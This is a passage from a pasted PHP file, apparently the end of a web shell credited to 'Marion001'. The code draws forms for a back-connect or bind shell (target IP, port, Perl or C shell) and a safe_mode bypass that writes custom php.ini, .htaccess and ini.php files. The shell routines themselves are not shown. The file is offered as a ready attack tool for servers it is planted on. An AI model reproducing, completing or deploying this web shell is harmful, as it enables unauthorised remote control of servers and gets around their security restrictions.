  2793. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  2794. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
  2795. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2796. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
  2797. echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
  2798. echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
  2799. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  2800. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
  2801. echo $te."</td>".$fe."</tr></div></table>";
  2802. }
  2803. if($safe_mode)
  2804. {
  2805. echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
  2806. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
  2807. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2808. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
  2809. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2810. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
  2811. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2812. echo $te.'</div>'.$table_end1.$fe;
  2813. }
  2814. echo '</table>'.$table_up3."</table>";
  2815. ?>
  2816. <html><body><center>
  2817. <div align=center id='n'><font face="Tahoma" size=3 color=red><b>_____<a href="https://www.facebook.com/Party.Marion001" target="_blank"><b>Marion001</b></a><br/></font></div>
  2818. <b><font face="Tahoma" size=-1 color="white">Generation time:</font></b> <font color="red" size=2><b><? echo round(getmicrotime()-starttime,4); ?></b></font> <font face="Tahoma" size=-1 color="white"><b>seconds</b></font>
  2819. </center></body></html>
RAW Paste Data